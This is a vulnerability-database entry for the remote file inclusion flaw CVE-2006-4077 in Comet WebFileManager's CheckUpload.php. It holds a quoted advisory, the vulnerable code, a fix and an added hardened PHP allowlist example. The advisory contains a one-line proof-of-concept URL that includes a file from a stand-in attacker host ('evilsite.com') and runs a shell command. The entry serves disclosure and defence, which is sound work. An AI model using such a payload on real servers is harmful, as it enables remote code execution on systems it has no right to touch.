Comet WebFileManager 'CheckUpload.php' Remote File Inclusion Vulnerability

Vulnerability ID: 1110774    Type: Input validation
Published: 2006-08-08    Updated: 2006-08-14
CVE: CVE-2006-4077    CNNVD ID: CNNVD-200608-181
Platform: PHP    CVSS score: 7.5
|Source
https://www.exploit-db.com/exploits/2151
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-181
|Details
Comet WebFileManager is a web-based remote file exchange and management application. An input validation vulnerability exists in the way Comet WebFileManager handles user requests; a remote attacker could exploit it to execute arbitrary commands on the server with the privileges of the web server process. The CheckUpload.php script does not properly validate the Language parameter, allowing an attacker to include arbitrary local or remote files and thereby execute arbitrary PHP code.
|Exploit
+--------------------------------------------------------------------
+
+ Cwfm-0.9.1 (Language) Remote File Inclusion
+
+ Original advisory:
+
+ http://www.bb-pcsecurity.de/Websecurity/301/org/Cwfm-0.9.1_(Language)_Remote_File_Inclusion.htm
+
+--------------------------------------------------------------------
+
+ Affected Software .: Cwfm 0.9.1
+ Vendor ............: http://cwfm.sourceforge.net/
+ Class .............: Remote File Inclusion in /CheckUpload.php
+ Risk ..............: high (Remote File Execution)
+ Found by ..........: Philipp Niedziela
+ Contact ...........: webmaster[at]bb-pcsecurity[.]de
+                      http://www.bb-pcsecurity.de
+
+--------------------------------------------------------------------
+
+ Code /CheckUpload.php
+
+ .....
+ session_start();
+ include_once("Global.php");
+ //include_once("lang/$Language.php");
+ include_once("$Language.php");
+ .....
+
+--------------------------------------------------------------------
+
+ $Language is not properly sanitized before being used.
+
+--------------------------------------------------------------------
+
+ Solution:
+ Declare $Language before using, include config-file or
+ deny direct access to the vuln file.
+
+--------------------------------------------------------------------
+
+ PoC:
+
+ http://[target]/CheckUpload.php?Language=http://evilsite.com/dblib.php/&cmd=ls
+
+--------------------------------------------------------------------
+
+ Note:
+ Vendor contacted, but no response. So do a dirty patch.
+
+-------------------------[ E O F ]----------------------------------

# milw0rm.com [2006-08-08]
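A hardened form of the include shown in the advisory above, as an added example that is not part of the original advisory or the Cwfm project: it declares the language variable itself instead of relying on register_globals, checks it against a fixed allowlist before building the path, and refuses direct access, which is what the advisory's solution section recommends. The lang/ directory, the language names and the CWFM_ENTRY constant are assumptions.

```php
<?php
declare(strict_types=1);
// Allowlist of language files that may be loaded from the lang/ directory.
// Anything not listed is rejected before include_once() ever sees it.
// The names are assumed; adjust to the files the installation actually ships.
const ALLOWED_LANGUAGES = ['en', 'de', 'fr'];
const DEFAULT_LANGUAGE = 'en';

/**
 * Map a requested language token to a file path inside $langDir, or return
 * null when the request does not match an allowlisted token exactly.
 */
function resolveLanguageFile(?string $requested, string $langDir): ?string
{
    // Declare the variable explicitly instead of relying on register_globals,
    // which is what let ?Language=... populate $Language in the original code.
    $language = $requested ?? DEFAULT_LANGUAGE;

    // Strict comparison against fixed tokens: a URL, a "../" path or a token
    // with a trailing null byte is not byte-identical to any entry and fails.
    if (!in_array($language, ALLOWED_LANGUAGES, true)) {
        return null;
    }
    return $langDir . '/' . $language . '.php';
}

/**
 * Hardened equivalent of the vulnerable lines in CheckUpload.php. CWFM_ENTRY
 * is an assumed constant that the application's real entry point defines;
 * requiring it denies direct requests to this script, as the advisory suggests.
 */
function loadLanguageOrFail(string $langDir): void
{
    if (!defined('CWFM_ENTRY')) {
        http_response_code(403);
        exit('Direct access is not permitted.');
    }
    $file = resolveLanguageFile($_GET['Language'] ?? null, $langDir);
    if ($file === null) {
        http_response_code(400);
        exit('Unsupported language.');
    }
    include_once $file;
}

// Constructed probes showing what the allowlist accepts and rejects.
foreach (['de', null, 'http://example.invalid/x.php', '../Global', "en\0"] as $probe) {
    $result = resolveLanguageFile($probe, '/srv/cwfm/lang');
    printf("%-34s => %s\n", var_export($probe, true), $result ?? 'rejected');
}
```

Only 'de' and the null (default) request resolve to a path; every other probe is reported as rejected, so nothing attacker-controlled is ever passed to include_once.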
|References

Source: BID
Name: 19433
Link: http://www.securityfocus.com/bid/19433
Source: VUPEN
Name: ADV-2006-3221
Link: http://www.frsirt.com/english/advisories/2006/3221
Source: MISC
Link: http://www.bb-pcsecurity.de/Websecurity/301/org/Cwfm-0.9.1_%28Language%29_Remote_File_Inclusion.htm
Source: SECUNIA
Name: 21432
Link: http://secunia.com/advisories/21432
Source: XF
Name: comet-checkupload-file-include(28292)
Link: http://xforce.iss.net/xforce/xfdb/28292
Source: BUGTRAQ
Name: 20060808 Cwfm <= 0.9.1 (Language) Remote File Inclusion Vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/442714/100/0/threaded